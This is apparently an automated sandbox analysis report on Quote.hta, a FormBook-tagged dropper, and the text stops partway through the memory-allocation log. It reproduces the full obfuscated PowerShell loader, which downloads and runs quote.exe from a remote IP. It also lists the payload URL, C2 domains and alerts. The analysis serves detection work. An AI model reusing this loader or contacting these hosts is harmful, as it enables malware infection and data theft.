Summary | ZeroBOX

Quote.hta

Formbook Generic Malware Antivirus Malicious Library PE File DLL PE32 PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us June 5, 2024, 9:13 a.m. June 5, 2024, 9:16 a.m.
Size 10.8KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 cd5915bac2ea167ddb7bcc2ae9ceab78
SHA256 0a377c75cd4db2defd6236cac3bf34dbfafdc5966aca8f8c2273ced42509f1f7
CRC32 B19F5ED5
ssdeep 192:IzTWjz8azPTz/6PmyMSrPq8/TIsErATDgyYB:p
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Quote.hta

    1984
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;

      2100

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49164 -> 198.23.201.89:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 198.23.201.89:80 -> 192.168.56.103:49164 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 198.23.201.89:80 -> 192.168.56.103:49164 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 198.23.201.89:80 -> 192.168.56.103:49164 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 202.172.28.202:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 154.215.72.110:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 116.50.37.244:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49187 -> 85.159.66.93:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 46.30.213.191:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49190 -> 91.195.240.94:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected
TCP 192.168.56.103:49193 -> 66.29.149.46:80 2050745 ET MALWARE FormBook CnC Checkin (GET) M5 Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:778
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes(
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: $ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqy
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: EOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){run
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: dll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: (78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestri
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: cted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: (78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Sta
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: rt-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJ
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: tgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,789
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: 24,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]:: <<<< Secur
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: ityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.Down
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: loadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($o
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: nRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveC
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: dbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJ
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: BxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LM
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: AIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(7
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: 39,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000167
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbbf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb4b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bb938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbfb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bc1b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bbc38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.23.201.89/warm/quote.exe
request GET http://198.23.201.89/warm/quote.exe
request POST http://www.3xfootball.com/fo8o/
request GET http://www.3xfootball.com/fo8o/?oRtj25=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&lR=TJtS0SjWYL-G11_
request GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
request POST http://www.kasegitai.tokyo/fo8o/
request GET http://www.kasegitai.tokyo/fo8o/?oRtj25=0LNqIGaAWMhMIMLOr1FzuAu+QFTp+Isr9lFre+yu3/9GvRNYi1uHghhDsQ/pqDAQ+wkUrFUIurr7TLyDqzId9vCn3h40hICDSYZjejM1bTxHHnFMxARLyMCZMUhSp6GMEGHL0HI=&lR=TJtS0SjWYL-G11_
request POST http://www.goldenjade-travel.com/fo8o/
request GET http://www.goldenjade-travel.com/fo8o/?oRtj25=LFKqyrcu7g1NCa8bIVnmntQ0zrEKrQSprIMLtaWgKJ9bBKQr4dsn0J7ZoYUgIJ+R6Sel8OhXEcHhC7LyM9bkgjIIu2U6i6kbe5asCJcEX28JEcHJIWfCjODnuc7OiogdzaMrHf8=&lR=TJtS0SjWYL-G11_
request POST http://www.antonio-vivaldi.mobi/fo8o/
request GET http://www.antonio-vivaldi.mobi/fo8o/?oRtj25=PTl5gU/3CD/Xhg5KAVLGoeqWcilDUK5FTZuVmm6gfrwSjnBrSraU5xyBGUoA1k9xMbAGIU7PLJqf1PTsNd74L3d6+NgzbyGN2pTsiSyIeh1B8hC/nFfIu9UZrk9ku3J39HvVUu8=&lR=TJtS0SjWYL-G11_
request POST http://www.magmadokum.com/fo8o/
request GET http://www.magmadokum.com/fo8o/?oRtj25=qL3nKp+YSjoaTomnND+fiETGbzpIgkHGMW8DXsDTZ4AADrD7Wpn1kxM1jYW2/C2WhyBblBh5NUSWrO5bZjyCcVkJYbxxq5QITB2h2xAyEikjbcoqZSmDOCeIE8A+B7hyBKIW8mw=&lR=TJtS0SjWYL-G11_
request POST http://www.rssnewscast.com/fo8o/
request GET http://www.rssnewscast.com/fo8o/?oRtj25=x3jV/ECx7FuzXOI+6CNaISj98UIEn47HyCIVaqWvGMMqpfz0YC5wNp/pxM1zEFNKv4nPeGfT8/lZrDaJmccs4488pD+gaHK32CxgTEs5a2vdBlM4hQBa8nlaMF5vesFSU19kJNk=&lR=TJtS0SjWYL-G11_
request POST http://www.techchains.info/fo8o/
request GET http://www.techchains.info/fo8o/?oRtj25=vefd0teQh+kbruh+iKW53cdcsQD4oFyRDgCUoL90YCYLczV+Hcc/VZ2eVbboy/u5EgiS3CnxBclKZHyNJ/4ALr08/A/SWk5lVGufGp2P4fG4f3GonqE4cYuaa0/JNC0RZIlRWrU=&lR=TJtS0SjWYL-G11_
request POST http://www.3xfootball.com/fo8o/
request POST http://www.kasegitai.tokyo/fo8o/
request POST http://www.goldenjade-travel.com/fo8o/
request POST http://www.antonio-vivaldi.mobi/fo8o/
request POST http://www.magmadokum.com/fo8o/
request POST http://www.rssnewscast.com/fo8o/
request POST http://www.techchains.info/fo8o/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2100
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02741000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02742000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02717000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02702000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02703000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02704000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02705000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02706000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02707000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02708000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02709000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2100
region_size: 4096
stack_dep_bypass: 0
